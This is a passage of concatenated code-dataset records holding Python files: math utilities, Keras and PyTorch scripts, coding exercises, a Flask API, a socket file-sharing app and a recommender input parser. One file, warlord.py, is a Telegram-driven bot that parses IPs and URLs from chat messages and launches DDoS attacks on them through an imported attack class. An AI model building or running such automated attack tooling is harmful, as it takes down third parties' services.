numbers via the Sieve of Eratosthenes.\n ** This code is due to David Eppstein, UC Irvine ** \n '''\n\tD = {} # map composite integers to primes witnessing their compositeness\n\tq = 2 # first integer to test for primality\n\twhile 1:\n\t\tif q not in D:\n\t\t\tyield q # not marked composite, must be prime\n\t\t\tD[q*q] = [q] # first multiple of q not already marked\n\t\telse:\n\t\t\tfor p in D[q]: # move each witness to its next multiple\n\t\t\t\tD.setdefault(p+q,[]).append(p)\n\t\t\tdel D[q] # no longer need D[q], free memory\n\t\tq += 1\n \n \ndef IsTrunctablePrime(num):\n \"\"\" Checks if the given PRIME number is Trunctable Prime on both direction \"\"\"\n for i in range(1,len(str(num))):\n if(not isPrimeFast(num//(10**i))): return False\n for i in range(1, 
len(str(num))):\n if(not isPrimeFast(num % (10**i))): return False\n return True \n \ndef Generate_n_Pandigit_Number(n):\n \"\"\" Returns a pan digit number containing 1..'n' digits \"\"\"\n digits = [str(i) for i in xrange(n, 0, -1)]\n\n for num in permutations(digits):\n yield int(''.join(num))\n \ndef Generate_n_Pandigit_Number_Prime(n):\n \"\"\" Returns a pan digit number containing 1..'n' digits \"\"\"\n digits = [str(i) for i in xrange(n, 0, -1)]\n\n for num in permutations(digits, len(digits)-1):\n ln = list(num)\n if('1' not in ln): ln.append('1')\n elif('3' not in ln): ln.append('3')\n elif('7' not in ln): ln.append('7')\n else: continue\n yield int(''.join(ln))\n\ndef Pentagonal_Numbers():\n \"\"\" Generator function for pentagonal numbers \n Pn = n*(3n-1)/2 \"\"\"\n \n n = 0 \n while True:\n n+= 1\n yield n*(3*n -1)/2\n\ndef IsPentagonal(n):\n \"\"\" Checks if the given number 'n' is pentagonal \"\"\"\n check = (math.sqrt(24*n + 1) + 1)/6\n return int(check) == check\n\ndef IsTriangular(n):\n \"\"\" Checks if the given number 'n' is pentagonal \"\"\"\n check = (math.sqrt(8*n + 1) - 1)/2\n return int(check) == check\n \ndef IsHexagonal(n):\n \"\"\" Checks if the given number 'n' is hexagonal \"\"\"\n check = (math.sqrt(8*n + 1) + 1)/4\n return int(check) == check\n\ndef totient_function(n):\n \"\"\" returns the value of totient function, uses \n Euler's formula, and fast prime checking methods\"\"\"\n\n if isPrimeFast(n): return n-1\n prime_list = PrimeList(n)\n total = 1\n for p in prime_list:\n if n % p == 0: \n total *= (1 - 1/p)\n\n return total*n\n\ndef find_all(a_str, sub):\n \"\"\" finds all the occurence of sub in a_str\"\"\"\n start = 0\n while True:\n start = a_str.find(sub, start)\n if start == -1: return\n yield start\n start += len(sub)\n\ndef Continued_Fraction_number_generator(n):\n \"\"\" for the sqrt(n), generates the number which goes on the CF formula 1 + 1/ x + ( 1/ x + ....))) \"\"\"\n a = n\n b = 0\n c = 1\n while True:\n alpha = int(math.floor((math.sqrt(a)+b)/c))\n yield alpha\n bnew = c*alpha - b\n cnew = a-bnew**2\n anew = a\n if cnew % c == 0:\n cnew = cnew / c\n else:\n anew = a * c\n bnew = bnew * c\n a,b,c = anew,bnew,cnew\n\ndef frac(b, term, v):\n return Fraction(b, term + v)\n\ndef sqrt_convergent(n):\n \"\"\" generates the convergent for the sqrt(n) \"\"\"\n l = Continued_Fraction_number_generator(n)\n a = l.next()\n fg = Fraction(1,l.next())\n while True:\n newFraction = a + fg\n yield newFraction.numerator, newFraction.denominator\n fg = frac(1, fg,l.next()) \n\ndef Pells_Eq_Solution(D):\n \"\"\" returns the smallest solution for the Quadratic Pells Equation for a given D\"\"\"\n ds = sqrt_convergent(D)\n for i in xrange(200):\n x,y = ds.next()\n if x**2 - D*(y**2) == 1:\n return x,y\n return 0,0\n\n","repo_name":"iamaaditya/Project-Euler","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":14422,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"74443515075","text":"import os\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\r\nimport tensorflow as tf\r\nfrom keras.models import load_model\r\nfrom PIL import Image, ImageOps\r\nimport numpy as np\r\n\r\n# Disable scientific notation for clarity\r\nnp.set_printoptions(suppress=True)\r\n\r\n# Load the model\r\nmodel = load_model('./models/keras_model.h5', compile=False)\r\nprint(model.summary())\r\n\r\n# Load the labels\r\nclass_names = open('./models/labels.txt', 'r').readlines()\r\n\r\n# Create the array 
of the right shape to feed into the keras model\r\n# The 'length' or number of images you can put into the array is\r\n# determined by the first position in the shape tuple, in this case 1.\r\n# data = np.ndarray(shape=(1, 224, 224, 3), dtype=np.float32)\r\n\r\n# Replace this with the path to your image\r\n# image = Image.open('./data/test/angular_leaf_spot/angular_leaf_spot_test.0.jpg').convert('RGB')\r\n\r\n#resize the image to a 224x224 with the same strategy as in TM2:\r\n#resizing the image to be at least 224x224 and then cropping from the center\r\nsize = (224, 224)\r\n# image = ImageOps.fit(image, size, Image.Resampling.LANCZOS)\r\n\r\ntrain_ds = tf.keras.preprocessing.image_dataset_from_directory(\r\n    \"./data/train\",\r\n    seed=123,\r\n    image_size=size,\r\n    batch_size=64)\r\n\r\ncorrections = 0\r\nnum_train_samples = 0\r\n\r\nfor image_batch, labels_batch in train_ds:\r\n    #turn the image into a numpy array\r\n    image_array = np.asarray(image_batch)\r\n    labels_batch = np.asarray(labels_batch)\r\n\r\n    # Normalize the image\r\n    normalized_image_array = (image_array.astype(np.float32) / 127.0) - 1\r\n\r\n    # run the inference\r\n    prediction = model.predict(normalized_image_array)\r\n    predictions = np.argmax(prediction, axis=1)\r\n    corrections += (predictions == labels_batch).sum()\r\n    num_train_samples += len(image_batch)\r\n\r\ntrain_acc = (corrections / num_train_samples) * 100.0\r\nprint(\"total train acc:\", train_acc, \"%\")\r\n\r\ntest_ds = tf.keras.preprocessing.image_dataset_from_directory(\r\n    \"./data/test\",\r\n    seed=123,\r\n    image_size=size,\r\n    batch_size=64)\r\n\r\ncorrections = 0\r\nnum_test_samples = 0\r\n\r\nfor image_batch, labels_batch in test_ds:\r\n    #turn the image into a numpy array\r\n    image_array = np.asarray(image_batch)\r\n    labels_batch = np.asarray(labels_batch)\r\n\r\n    # Normalize the image\r\n    normalized_image_array = (image_array.astype(np.float32) / 127.0) - 1\r\n\r\n    # run the inference\r\n    prediction = model.predict(normalized_image_array)\r\n    predictions = np.argmax(prediction, axis=1)\r\n    corrections += (predictions == labels_batch).sum()\r\n    num_test_samples += len(image_batch)\r\n\r\ntest_acc = (corrections / num_test_samples) * 100.0\r\nprint(\"total test acc:\", test_acc, \"%\")","repo_name":"angseung/beans_classify","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38565138235","text":"import inflect\np = inflect.engine()\n\ndef main():\n    name_list = []\n    try:\n        while True:\n            name = input(\"Name: \")\n            name_list.append(name)\n    except EOFError:\n        joined_list = p.join(name_list)\n        print(f\"Adieu, adieu, to {joined_list}\") \n\nif __name__ == \"__main__\":\n    main()","repo_name":"nogueira-tiago/CS50-Python","sub_path":"problem_set_4/adieu/adieu.py","file_name":"adieu.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32320044935","text":"from string import ascii_letters\n\nelf1_sack: str = \"\"\nelf2_sack: str = \"\"\nelf3_sack: str = \"\"\ncounter: int = 0\ncommon_char: str = \"\"\nrearrange_list: str = \"\"\npriority_number: int = 1\npri_dict = {}\npriority_sum: int = 0\n\ninput_list = open(r\"Day3/day3_input.txt\", \"r\")\nfor line in input_list:\n    elf3_sack = elf2_sack\n    elf2_sack = elf1_sack\n    elf1_sack = line\n    counter += 1\n    if counter == 3:\n        for item in elf1_sack:\n            if item in elf2_sack and item in 
elf3_sack:\n rearrange_list = rearrange_list + item\n counter = 0\n break\n\nfor letter in ascii_letters:\n pri_dict[letter] = priority_number\n priority_number += 1\n# print(pri_dict)\n\n\nfor thing in rearrange_list:\n priority_sum = priority_sum + pri_dict[thing]\nprint(priority_sum)\n","repo_name":"Cyber-Shark/AdventOfCode","sub_path":"Day3/solver_part2.py","file_name":"solver_part2.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23391284011","text":"def ispalindrome(x):\n\tstring = str(x)\n\tpalindromelen =len(string)\n\tif palindromelen==1:\n\t\treturn 1\n\tpalindromelen /= 2\n\treturn string[:palindromelen]==string[-palindromelen:][::-1]\n\nt = int(raw_input());\nfor testcase in range(1,t+1):\n\tstring = raw_input()\n\t(start,end) = string.split()\n\tstart = int(start)\n\tend = int(end)\n\tans = 0\n\tnow = int(start**(0.5))\n\twhile 1!=0:\n\t\tNOW = now * now\n\t\tif NOW > end:\n\t\t\tbreak\n\t\tif NOW>=start and ispalindrome(now) and ispalindrome(NOW):\n\t\t\tans+=1\n\t\tnow+=1\n\tprint(\"Case #\"+str(testcase)+\": \"+str(ans))\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_118/1289.py","file_name":"1289.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19987481690","text":"from flask import Flask, request, jsonify, abort\nfrom datetime import datetime\nimport iso8601\nimport pytz\nimport os\nimport re\n\napp = Flask(__name__)\n\n\ndef list_thumbnails(start, end):\n thumbs = os.listdir('../static/thumbs/')\n # print(thumbs)\n app.logger.debug(len(thumbs))\n p = re.compile('out([^\\.]*)\\.png')\n result = []\n latest_timestamp = iso8601.parse_date(\"2000-12-07T23:48:52-0500\")\n for t in thumbs:\n # \"out2017-12-07T23_48_52-0500.png\"\n # -> \"out2017-12-07T23:48:52-0500.png\"\n # -> \"2017-12-07T23:48:52-0500\"\n # -> local datetime\n # -> utc datetime\n m = p.search(t.replace(\"_\", \":\"))\n if m:\n t_timestamp = iso8601.parse_date(m.group(1))\n t_timestamp = t_timestamp.astimezone(pytz.utc)\n latest_timestamp = max(latest_timestamp, t_timestamp)\n if t_timestamp >= start and t_timestamp <= end:\n result.append({\n \"timestamp\": t_timestamp.isoformat(),\n \"url\": \"http://localhost:8080/play/thumbs/%s\" % t\n })\n else:\n app.logger.error(\"Error parsing {}\".format(t))\n # else:\n # app.logger.debug(\"Value outside range: \"+start.isoformat()+\" - \"+end.isoformat())\n # app.logger.debug(t_timestamp.isoformat())\n app.logger.debug(\"Latest timestamp: \"+latest_timestamp.isoformat()+\" ... 
\"+start.isoformat()+\" - \"+end.isoformat())\n return result\n\n\n@app.route('/api/')\ndef list_thumbnails_view():\n filter_start = request.args.get('start')\n filter_stop = request.args.get('end')\n if filter_start and filter_stop:\n filter_start_date = iso8601.parse_date(filter_start)\n filter_stop_date = iso8601.parse_date(filter_stop)\n thumbnails = list_thumbnails(filter_start_date, filter_stop_date)\n app.logger.error(len(thumbnails))\n return jsonify({'results': thumbnails})\n return abort(400)\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5090, debug=True)\n","repo_name":"jhaip/seriallogger2","sub_path":"streaming/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73161450753","text":"import os\r\nfrom art import logo\r\n\r\nbids = {}\r\nnum_of_bidders = 1\r\n\r\n\r\ndef take_bid(bidders):\r\n name = input(\"Hello next bidder, what is your awesome bidding alias?\\n >\")\r\n # Bid can only be a full int, not a float\r\n bid = int(input(\"\\nGreat, and how much money will you be bidding?\\n > $\"))\r\n bidders[name] = bid\r\n # Currently, if the same user enters a higher bid, it will treat them like a new person.\r\n print(\r\n f\"\\nAwesome, {len(bidders)} bidders so far! Before we close the bid, will there be anyone else bidding today?\"\r\n )\r\n\r\n\r\nprint(logo)\r\nprint(\"Welcome to the world's most ghetto auction program.\\n\")\r\nname = input(\"\\nWhat is your awesome bidding alias?\\n >\")\r\nbid = int(\r\n input(\r\n \"\\nGreat, since you're here I assume you have money. How much of that loot will you be bidding today?\\n > $\"\r\n ))\r\nbids[name] = bid\r\nprint(\r\n \"\\nIt wouldn't be much of an auction if you bid alone... is there anyone else who'd like to spend some cash?\"\r\n)\r\nother_bidders = input(\"\\nType Yes or No.\\n >\").lower()\r\n\r\nwhile other_bidders == \"yes\":\r\n os.system(\"clear\")\r\n print(logo)\r\n take_bid(bids)\r\n other_bidders = input(\"Type Yes or No.\\n >\").lower()\r\n\r\nwinner = (max(bids, key=bids.get))\r\nwinning_bid = bids[winner]\r\nprint(\r\n f\"Winner winner chicken dinner! The winner of this auction is {winner}! 
With an astounding bid of ${winning_bid}!\"\r\n)\r\n","repo_name":"DenzelBraithwaite/100-days-of-Python","sub_path":"day_nine/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11295158200","text":"#!/usr/bin/env python3\n\n########################################################################\n\nimport socket\nimport argparse\nimport sys\n\n# Lab 3 Additional Libraries\nimport os\nimport time\n\n########################################################################\n# Echo-Server class\n########################################################################\n\n# We will not be using this, use the Server class with threading in\n# EchoClientServer_Thread.py\nclass Server:\n\n HOSTNAME = socket.gethostname()\n PORT = 30001\n\n RECV_SIZE = 1024\n BACKLOG = 10\n \n MSG_ENCODING = \"utf-8\"\n\n def __init__(self):\n self.create_listen_socket()\n self.process_connections_forever()\n\n def create_listen_socket(self):\n try:\n # Create an IPv4 TCP socket.\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n # Get socket layer socket options.\n self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n\n # Bind socket to socket address, i.e., IP address and port.\n self.socket.bind( (Server.HOSTNAME, Server.PORT) )\n\n # Set socket to listen state.\n self.socket.listen(Server.BACKLOG)\n print(\"Listening on port {} ...\".format(Server.PORT))\n except Exception as msg:\n print(msg)\n sys.exit(1)\n\n def process_connections_forever(self):\n try:\n while True:\n # Block while waiting for incoming connections. When\n # one is accepted, pass the new socket reference to\n # the connection handler.\n self.connection_handler(self.socket.accept())\n except Exception as msg:\n print(msg)\n except KeyboardInterrupt:\n print()\n finally:\n self.socket.close()\n sys.exit(1)\n\n def connection_handler(self, client):\n connection, address_port = client\n print(\"-\" * 72)\n print(\"Connection received from {}.\".format(address_port))\n\n while True:\n\n try:\n\n # Receive bytes over the TCP connection. This will block\n # until \"at least 1 byte or more\" is available.\n recvd_bytes = connection.recv(Server.RECV_SIZE)\n \n # If recv returns with zero bytes, the other end of the\n # TCP connection has closed (The other end is probably in\n # FIN WAIT 2 and we are in CLOSE WAIT.). If so, close the\n # server end of the connection and get the next client\n # connection.\n if len(recvd_bytes) == 0:\n print(\"Closing client connection ... \")\n connection.close()\n break\n \n # Decode the received bytes back into strings. Then output\n # them.\n recvd_str = recvd_bytes.decode(Server.MSG_ENCODING)\n print(\"Received: \", recvd_str)\n \n # Send the received bytes back to the client.\n connection.sendall(recvd_bytes)\n print(\"Sent: \", recvd_str)\n\n except KeyboardInterrupt:\n print()\n print(\"Closing client connection ... \")\n connection.close()\n break\n\n########################################################################\n# Echo-Client class\n########################################################################\n\n# We will be using this for for Lab 3\nclass Client: # Sender\n\n SERVER_HOSTNAME = socket.gethostname()\n RECV_SIZE = 1024\n\n ########################### MODIFICATIONS ##########################\n\n HOST = socket.gethostbyname(socket.gethostname())\n\n # Send the broadcast packet periodically. 
Set the period (seconds)\n BROADCAST_PERIOD = 1\n\n # Define the message to broadcast.\n MSG_ENCODING = \"utf-8\"\n MESSAGE = \"SERVICE DISCOVERY\"\n MESSAGE_ENCODED = MESSAGE.encode(MSG_ENCODING)\n\n # Use the broadcast-to-everyone IP address or a directed broadcast\n # address. Define a broadcast port.\n BROADCAST_ADDRESS = \"255.255.255.255\"\n BROADCAST_PORT = 30000 # Service Discovery Port (SDP)\n ADDRESS_PORT = (BROADCAST_ADDRESS, BROADCAST_PORT)\n\n ACCEPT_TIMEOUT = 5 # (seconds)\n RECV_SIZE = 1024\n NUM_BROADCAST_PACKETS = 3 # Send 3 \"SERVICE DISCOVERY\" packets\n\n ####################################################################\n\n def __init__(self):\n self.get_socket()\n self.send_console_input_forever()\n\n def get_console_input(self):\n # In this version we keep prompting the user until a non-blank\n # line is entered.\n while True:\n self.input_text = input(\"Enter command: \")\n if self.input_text != '':\n break\n\n def console_commands(self):\n if self.input_text == \"scan\": # THIS WORKS!!!\n self.send_broadcasts()\n elif self.input_text[:7] == \"connect\": # THIS WORKS!!!\n # This is to establish a TCP connection to the server\n IP_addr = ''\n port = ''\n firstWord = True\n for i in self.input_text[8:]:\n if i == ' ':\n firstWord = False\n continue\n if firstWord:\n IP_addr += i\n else:\n port += i\n self.connect_to_server(IP_addr, int(port))\n elif self.input_text == \"llist\": # THIS WORKS!!!\n self.client_directory()\n print(\"Local File Sharing Directory\", self.listDir)\n elif self.input_text == \"rlist\": # THIS WORKS!!!\n self.input_text = \"list\"\n self.connection_send() # Send \"list\" command to Server\n self.connection_receive()\n elif self.input_text[:3] == \"put\":\n self.connection_send()\n print(\"fileName:\", self.input_text[4:])\n self.send_file(self.input_text[4:])\n elif self.input_text[:3] == \"get\": # THIS WORKS!!!\n self.connection_send()\n self.receive_file(self.input_text[4:])\n elif self.input_text[:3] == \"bye\": # THIS WORKS!!!\n self.connection_send() # Send \"bye\" command to Server\n print(\"Closing server connection ...\")\n self.socket[0].close()\n sys.exit(1)\n else:\n print(\"Invalid command\")\n \n def send_console_input_forever(self):\n while True:\n try:\n self.get_console_input()\n self.console_commands()\n #print(\"Did it even come back here?\")\n except (KeyboardInterrupt, EOFError):\n print()\n print(\"Closing server connection ...\")\n self.socket[0].close()\n sys.exit(1)\n\n def client_directory(self):\n os.chdir(\"clientDirectory\")\n self.listDir = os.listdir(os.getcwd())\n os.chdir(\"..\")\n\n def get_socket(self):\n try: \n # Create an IPv4 TCP socket [0] and set up a UDP socket [1].\n self.socket = [socket.socket(socket.AF_INET, socket.SOCK_STREAM),\n socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]\n\n # Set the option for broadcasting.\n self.socket[1].setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\n\n # To get the response from SERVER / RECEIVER?\n self.socket[1].bind((Client.HOST, Client.BROADCAST_PORT)) \n except Exception as msg:\n print(msg)\n sys.exit(1)\n\n def send_file(self, fileName): # For \"put\" command to server\n os.chdir(\"clientDirectory\") # Server file directory\n with open(fileName, 'rb') as f:\n while True:\n bytesToSend = f.read(256)\n currSize = sys.getsizeof(bytesToSend)\n self.socket[0].send(bytesToSend)\n if currSize < 256:\n break\n print(fileName, \"succesfully sent!\")\n f.close()\n os.chdir(\"..\") # Move out of directory\n\n def receive_file(self, fileName): # For \"get\" 
command to server\n os.chdir(\"clientDirectory\") # Client files directory\n## print(\"Current working directory:\", os.getcwd())\n with open('new_' + fileName, 'wb') as f:\n while True:\n data = self.socket[0].recv(256)\n currSize = sys.getsizeof(data)\n print(currSize)\n f.write(data)\n if currSize < 256:\n break\n f.close()\n print(fileName, \"succesfully received!\")\n os.chdir(\"..\") # Move out of directory\n\n\n ############################################################################\n # TCP/IP Methods\n ############################################################################\n\n def connect_to_server(self, IP_addr, port):\n try:\n # Connect to the server using its socket address tuple.\n #self.socket.connect((Client.SERVER_HOSTNAME, Server.PORT))\n #print(\"It tried to connect to the server tho?????\")\n self.socket[0].connect((IP_addr, port))\n except Exception as msg:\n print(msg)\n sys.exit(1)\n \n def connection_send(self):\n try:\n # Send string objects over the connection. The string must\n # be encoded into bytes objects first.\n self.socket[0].sendall(self.input_text.encode(Server.MSG_ENCODING))\n print(\"Sent: \", self.input_text)\n except Exception as msg:\n print(msg)\n sys.exit(1)\n\n def connection_receive(self):\n try:\n # Receive and print out text. The received bytes objects\n # must be decoded into string objects.\n recvd_bytes = self.socket[0].recv(Client.RECV_SIZE)\n\n # recv will block if nothing is available. If we receive\n # zero bytes, the connection has been closed from the\n # other end. In that case, close the connection on this\n # end and exit.\n if len(recvd_bytes) == 0:\n print(\"Closing server connection ... \")\n self.socket[0].close()\n sys.exit(1)\n\n print(\"Received: \", recvd_bytes.decode(Server.MSG_ENCODING))\n\n except Exception as msg:\n print(msg)\n sys.exit(1)\n\n ############################################################################\n # UDP Methods\n ############################################################################\n\n## def create_sender_socket(self):\n## try:\n## # Set up a UDP socket. 
Index 0.\n## self.socket.append(socket.socket(socket.AF_INET, socket.SOCK_DGRAM))\n##\n## # Set the option for broadcasting.\n## self.socket[0].setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\n##\n## # To get the response from SERVER / RECEIVER?\n## self.socket[0].bind((Client.HOST, Client.BROADCAST_PORT)) \n## except Exception as msg:\n## print(msg)\n## sys.exit(1)\n\n def send_broadcasts(self):\n try:\n self.socket[1].settimeout(Client.ACCEPT_TIMEOUT)\n for i in range(Client.NUM_BROADCAST_PACKETS):\n print(\"Broadcasting to {} ...\".format(Client.ADDRESS_PORT))\n self.socket[1].sendto(Client.MESSAGE_ENCODED, Client.ADDRESS_PORT)\n \n # Response from SERVER / RECEIVER\n data, address = self.socket[1].recvfrom(Client.RECV_SIZE)\n time.sleep(Client.BROADCAST_PERIOD)\n #print(data.decode(Client.MSG_ENCODING) == \"Jastine's File Sharing Service\")\n if data.decode(Client.MSG_ENCODING) == \"Jastine's File Sharing Service\":\n print(data.decode(Client.MSG_ENCODING), \"found at\", \"{}\".format((Client.HOST, \"30001\")))\n except socket.timeout:\n print(\"No service found\")\n except KeyboardInterrupt:\n print()\n print(\"Closing CLIENT / SENDER connection ...\")\n except Exception as msg:\n print(msg)\n## finally:\n## #print(\"Just wondering if it did this\")\n self.socket[1].close()\n## #sys.exit(1)\n\n########################################################################\n# Process command line arguments if run directly.\n########################################################################\n\nif __name__ == '__main__':\n roles = {'client': Client,'server': Server}\n parser = argparse.ArgumentParser()\n\n parser.add_argument('-r', '--role',\n choices=roles, \n help='server or client role',\n required=True, type=str)\n\n args = parser.parse_args()\n roles[args.role]()\n\n########################################################################\n\n\n\n\n\n","repo_name":"sittingherelikeaboss/Online-File-Sharing-Network-App","sub_path":"Test4/EchoClientServer.py","file_name":"EchoClientServer.py","file_ext":"py","file_size_in_byte":13009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23148928462","text":"import sys\nfrom collections import deque\nimport copy\ndef main():\n S = input()\n T = input()\n ans = 0\n for i in range(len(S)):\n if S[i] != T[i]:\n ans += 1\n print(ans)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Tomoki-Kikuta/atcoder","sub_path":"abc172/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10427953372","text":"# -*- coding: utf-8 -*-\nimport torch\nfrom torch import nn, optim\nfrom matplotlib import pyplot as plt\nfrom sklearn.datasets import load_digits\ndigits = load_digits()\n\nX = digits.data\ny = digits.target\n\nX = torch.tensor(X, dtype=torch.float32)\ny = torch.tensor(y, dtype=torch.int64)\n\nnet = nn.Linear(X.size()[1] , 10)\n\nloss_fn = nn.CrossEntropyLoss()\n\noptimizer = optim.SGD(net.parameters(), lr = 0.01)\n\nlosses = []\n\nfor epoch in range(100):\n optimizer.zero_grad()\n \n y_pred = net(X)\n \n loss = loss_fn(y_pred, y)\n loss.backward()\n \n optimizer.step()\n \n losses.append(loss.item)\n\n_, y_pred = torch.max(net(X), 1)\nans_per = (y_pred == 
y).sum().item()/len(y)\n\nprint(ans_per)","repo_name":"hika019/takarakuzi","sub_path":"p42.py","file_name":"p42.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38572113281","text":"import asyncio\nimport dotenv\nimport re\nimport parser\n\nfrom telethon import TelegramClient, events\nfrom spam_units import Unit\nfrom winger import Winger\n\nconf = dotenv.dotenv_values()\n\napi_id = conf.get('tg_api_id')\napi_hash = conf.get('tg_api_hash')\n\nclient = TelegramClient('f.russia', int(api_id), api_hash)\n\n\nasync def attack(units: [Unit]):\n for unit in units:\n await Winger(unit).attack()\n\n\nasync def main():\n await client.start()\n pattern = re.compile(\n r'[\\W\\w]+(https?://[\\w\\-\\.]+\\.\\w{2,5})|(\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})|(\\d+)/(tcp|udp|http)',\n re.M | re.I\n )\n\n @client.on(events.NewMessage(pattern=pattern))\n async def handler(event):\n # check whether the message contains any IP\n ips = re.compile(\n r'(\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})',\n re.M\n ).findall(event.message.message)\n if len(ips) == 0:\n return\n\n units = parser.msg_parse_units(event.message.message)\n await attack(units)\n\n await client.run_until_disconnected()\n\n\nasyncio.run(main())\n","repo_name":"Linguisto/autoddos","sub_path":"warlord.py","file_name":"warlord.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23562801101","text":"def is_increasing(num):\n num_list = list(str(num))\n return all(x<=y for x, y in zip(num_list, num_list[1:]))\n\nf = open('p2.small.in', 'r')\nnum_cases = int(f.readline())\nfor i in range(num_cases):\n num = int(f.readline())\n while not is_increasing(num):\n sub = num % 10\n num -= (sub + 1)\n print(\"Case #{}: {}\".format(i+1, num))\n\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/4847.py","file_name":"4847.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34626273389","text":"import logging\n\nimport tensorflow as tf\n\nfrom easy_rec.python.input.input import Input\nfrom easy_rec.python.ops.gen_str_avx_op import str_split_by_chr\nfrom easy_rec.python.utils.check_utils import check_split\nfrom easy_rec.python.utils.check_utils import check_string_to_number\nfrom easy_rec.python.utils.input_utils import string_to_number\nfrom easy_rec.python.utils.tf_utils import get_tf_type\n\nif tf.__version__ >= '2.0':\n tf = tf.compat.v1\n\n\nclass RTPInput(Input):\n \"\"\"RTPInput for parsing rtp fg new input format.\n\n Our new format(csv in csv) of rtp output:\n label0, item_id, ..., user_id, features\n here the separator(,) could be specified by data_config.rtp_separator\n For the feature column, features are separated by \u0002,\n multiple values of one feature are separated by \u0003, such as:\n ...\u000220\u0002beauty\u0003smart\u0002Paris\u0002...\n The features column and labels are specified by data_config.selected_cols,\n columns are selected by indices as our csv file has no header,\n such as: 0,1,4, means the 4th column is features, the 1st and 2nd\n columns are labels\n \"\"\"\n\n def __init__(self,\n data_config,\n feature_config,\n input_path,\n task_index=0,\n task_num=1,\n check_mode=False,\n pipeline_config=None):\n super(RTPInput,\n self).__init__(data_config, feature_config, input_path, 
task_index,\n task_num, check_mode, pipeline_config)\n logging.info('input_fields: %s label_fields: %s' %\n (','.join(self._input_fields), ','.join(self._label_fields)))\n self._rtp_separator = self._data_config.rtp_separator\n if not isinstance(self._rtp_separator, str):\n self._rtp_separator = self._rtp_separator.encode('utf-8')\n self._selected_cols = [\n int(x) for x in self._data_config.selected_cols.split(',')\n ]\n self._num_cols = -1\n self._feature_col_id = self._selected_cols[-1]\n logging.info('rtp separator = %s' % self._rtp_separator)\n\n def _parse_csv(self, line):\n record_defaults = ['' for i in range(self._num_cols)]\n\n # the actual features are in one single column\n record_defaults[self._feature_col_id] = self._data_config.separator.join([\n str(self.get_type_defaults(t, v))\n for x, t, v in zip(self._input_fields, self._input_field_types,\n self._input_field_defaults)\n if x not in self._label_fields\n ])\n\n check_list = [\n tf.py_func(\n check_split, [line, self._rtp_separator,\n len(record_defaults)],\n Tout=tf.bool)\n ] if self._check_mode else []\n with tf.control_dependencies(check_list):\n fields = tf.string_split(line, self._rtp_separator, skip_empty=False)\n\n fields = tf.reshape(fields.values, [-1, len(record_defaults)])\n\n labels = []\n for idx, x in enumerate(self._selected_cols[:-1]):\n field = fields[:, x]\n fname = self._input_fields[idx]\n ftype = self._input_field_types[idx]\n tf_type = get_tf_type(ftype)\n if field.dtype in [tf.string]:\n check_list = [\n tf.py_func(check_string_to_number, [field, fname], Tout=tf.bool)\n ] if self._check_mode else []\n with tf.control_dependencies(check_list):\n field = tf.string_to_number(field, tf_type)\n labels.append(field)\n\n # only for features, labels excluded\n record_types = [\n t for x, t in zip(self._input_fields, self._input_field_types)\n if x not in self._label_fields\n ]\n # assume that the last field is the generated feature column\n print('field_delim = %s' % self._data_config.separator)\n feature_str = fields[:, self._feature_col_id]\n check_list = [\n tf.py_func(\n check_split,\n [feature_str, self._data_config.separator,\n len(record_types)],\n Tout=tf.bool)\n ] if self._check_mode else []\n with tf.control_dependencies(check_list):\n fields = str_split_by_chr(\n feature_str, self._data_config.separator, skip_empty=False)\n tmp_fields = tf.reshape(fields.values, [-1, len(record_types)])\n rtp_record_defaults = [\n str(self.get_type_defaults(t, v))\n for x, t, v in zip(self._input_fields, self._input_field_types,\n self._input_field_defaults)\n if x not in self._label_fields\n ]\n fields = []\n for i in range(len(record_types)):\n field = string_to_number(tmp_fields[:, i], record_types[i],\n rtp_record_defaults[i], i)\n fields.append(field)\n\n field_keys = [x for x in self._input_fields if x not in self._label_fields]\n effective_fids = [field_keys.index(x) for x in self._effective_fields]\n inputs = {field_keys[x]: fields[x] for x in effective_fids}\n\n for x in range(len(self._label_fields)):\n 